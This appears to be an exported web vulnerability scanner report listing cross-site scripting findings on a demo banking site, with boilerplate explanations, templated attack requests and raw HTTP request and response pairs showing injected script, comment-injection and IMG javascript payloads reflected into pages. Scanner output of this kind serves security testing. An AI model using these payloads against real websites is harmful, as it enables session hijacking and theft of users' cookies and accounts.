To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?msg2=no&msg=<attack>>"><script>alert("XSS")</script></attack> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/forgot1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
<script>alert\("XSS"\)<\/script>GET /banklogin.asp?err=>"><script>alert('XSS')</script> HTTP/1.0
Referer: http://zero.webappsecurity.com:80/login1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:37:05 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4947
Content-Type: text/html
Cache-control: private
Set-Cookie: state=; path=/
Set-Cookie: userid=; path=/
Set-Cookie: username=; path=/
Set-Cookie: sessionid=; path=/
<HTML>
<HEAD>
<TITLE></TITLE>
</HEAD>
<BODY>
<TABLE BGCOLOR="#ffffff" STYLE="border: 3px solid black">
<TR>
<TD
STYLE="border-left: 12px solid #2E7AA3; border-top: 7px solid #2E7AA3"
HEIGHT="47" ROWSPAN="2" VALIGN="TOP"><IMG
SRC="/images/freebank-logo2.gif" ALIGN="LEFT" BORDER="0" WIDTH="150"
HEIGHT="50"><BR><BR></TD>
<TD STYLE="border-top: 7px solid #2E7AA3" WIDTH="571" HEIGHT="47"
VALIGN="TOP"> </TD>
<TD STYLE="border-top: 7px solid #2E7AA3" WIDTH="571"
VALIGN="TOP"> </TD>
</TR>
<TR>
<TD WIDTH="571" VALIGN="TOP" ROWSPAN="7" HEIGHT="49">
<TABLE>
<TR>
<TD BGCOLOR="#2E7AA3" STYLE="border: 1px solid black" WIDTH="258"
HEIGHT="217">
<FORM ACTION="login1.asp" METHOD="post">
<CENTER>>"><script>alert('XSS')</script><br>Username:<BR><INPUT TYPE="text" NAME="login"
STYLE="border: 1px solid black; spacing: 0"><BR>Password:<BR><INPUT TYPE="password"
NAME="password" STYLE="border: 1px solid black; spacing: 0"><BR><INPUT
TYPE="radio" NAME="graphicOption" VALUE="minimum" CHECKED="CHECKED"><FONT
SIZE="-1">Minimum Graphics</FONT><BR><INPUT TYPE="radio" NAME="graphicOption"
VALUE="standard"><FONT SIZE="-1">Standard Graphics</FONT><BR><BR><INPUT
TYPE="submit" STYLE="border: 1px solid black"
VALUE=" Access Accounts "><BR></CENTER></FORM></TD>
<TD STYLE="border: 1px solid black" WIDTH="304" HEIGHT="217"
ROWSPAN="2"><IMG SRC="/images/lock.gif" WIDTH="304" HEIGHT="266"
BORDER="0"></TD>
</TR>
<TR>
<TD BGCOLOR="ffffff" STYLE="border: 1px solid black" WIDTH="258" HEIGHT="241"
VALIGN="TOP"><FONT SIZE="-2">We are confident of our system's ability to
protect all transactions; however, this is not an invitation for people to
attempt unauthorized access to the system. This is a private computing system
which is restricted to authorized individuals. Actual or attempted unauthorized
use of this computer system may result in criminal and/or civil prosecution. We
reserve the right to view, monitor, and record activity on the system without
notice or permission. Any information obtained by monitoring, reviewing, or
recording is subject to review by law enforcement organizations in connection
with the investigation or prosecution of possible criminal activity on the
system. If you are not an authorized user of this system or do not consent to
continued monitoring, exit the system at this time. </FONT></TD>
</TR>
</TABLE></TD>
<TD WIDTH="175" VALIGN="TOP" ROWSPAN="7"><table width="175" border="0" cellspacing="3" cellpadding="5">
<tr>
<td STYLE="border: 1px solid black"><p><img src="images/SPI_logo.jpg" width="150" height="36"></p>
<p><font size="2" face="Arial, Helvetica, sans-serif">If you would
like a free trial version of WebInspect to test this website
site.</font></p>
<p><font size="2" face="Arial, Helvetica, sans-serif"><a href="http://www.spidynamics.com/download.html" target="_blank"><strong>Download Click Here</strong></a></font></p></td>
</tr>
</table></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"><IMG
SRC="/images/customer-login.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"><A
HREF="/pindex.asp"><IMG SRC="/images/financial-planning.gif" ALIGN="LEFT"
BORDER="0" WIDTH="150" HEIGHT="20"></A></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"
HEIGHT="19"><IMG SRC="/images/services.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"
HEIGHT="24"><IMG SRC="/images/your-accounts.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"><IMG
SRC="/images/customer-support.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border-left: 12px solid #2E7AA3" WIDTH="162"
ALIGN="CENTER">
<FORM ACTION="rootlogin.asp" METHOD="post">
<P><FONT SIZE="-1" FACE="Arial"> Register for an Interest Checking
Account with FreeBank:</FONT></P>
<P><FONT SIZE="-1" FACE="Arial">First Name:</FONT><INPUT
TYPE="text" NAME="txtPassPhrase"
STYLE="border: 1px solid black; spacing: 0"><BR><FONT SIZE="-1"
FACE="Arial">Last Name:</FONT><INPUT TYPE="text" NAME="txtName"
STYLE="border: 1px solid black; spacing: 0"><BR>
<INPUT TYPE="hidden" NAME="txtHidden" VALUE="This was hidden from the user">
<INPUT TYPE="submit" STYLE="border: 1px solid black"
VALUE="Register"></P></FORM></TD>
</TR>
</TABLE>
</BODY>
</HTML>
Possible Bracket Double Quote Cross-Site Scripting (Single Quote)Cross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This is one of the most common type of cross-site scripting. The primary difference between this and the double quote attack is the use of apostrophes and quotes in the JavaScript code.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?err=<attack>>"><script>alert('XSS')</script></attack> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/login1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
<script>alert\('XSS'\)<\/script>GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=>"><script>alert("XSS")</script>&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:32 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4006
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=">"><script>alert("XSS")</script>"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
Possible Bracket Double Quote Cross-Site Scripting (Double Quote)Cross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This is one of the most common type of cross-site scripting. The primary difference between this and the single quote attack is the use of apostrophes and quotes in the JavaScript code.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=<attack>>"><script>alert("XSS")</script></attack>&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/join1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
<script>alert\("XSS"\)<\/script>POST /pformresults.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp.bak
Content-Length: 125
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
txtHidden=This+was+hidden+from+the+user&dbConnectString=--><script>alert('XSS')</script>&txtFirstName=Joe&txtLastName=SwinneyHTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:57:02 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 348
Content-Type: text/html
Cache-control: private
<html>
<body>
<P>The parameter "txtFirstName" = Joe</P>
<P>The parameter "txtLastName" = Swinney</P><br>
<P>The <b>hidden</b> parameter "txtHidden" = Swinney</P><br>
<P>The <b>hidden</b> parameter "dbConnectString" = --><script>alert('XSS')</script></P><br>
<a href="pindex.asp">Click here to return to index</a>
</body>
</html>
Possible Comment Injection Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This takes place due to the fact that some web applications embed user input in the HTML comments. <br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.POST <var name="path"/> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/pindex.asp.bak
Content-Length: 125
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
txtHidden=This+was+hidden+from+the+user&dbConnectString=<attack>--><script>alert('XSS')</script></attack>&txtFirstName=Joe&txtLastName=Swinney--><script>alert\('XSS'\)<\/script>GET /join.asp?name=&email=&surname=&house=&street=>"><script>alert("XSS")</script>&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:32 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4006
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=">"><script>alert("XSS")</script>"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
Possible Bracket Double Quote Cross-Site Scripting (Double Quote)Cross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This is one of the most common type of cross-site scripting. The primary difference between this and the single quote attack is the use of apostrophes and quotes in the JavaScript code.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?name=&email=&surname=&house=&street=<attack>>"><script>alert("XSS")</script></attack>&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/join1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
<script>alert\("XSS"\)<\/script>GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=>"'><img%20src="javascript:alert('XSS')">&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:39 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4013
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=">"'><img src="javascript:alert('XSS')">"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
Possible IMG-Tag Embedded Javascript Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This takes place by embedding potentially malicious JavaScript code using an IMG tag with a specific JavaScript link as its source. <br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=<attack>>"'><img%20src="javascript:alert('XSS')"></attack>&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/join1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
javascript:alert\('XSS'\)">POST /rootlogin.asp HTTP/1.0
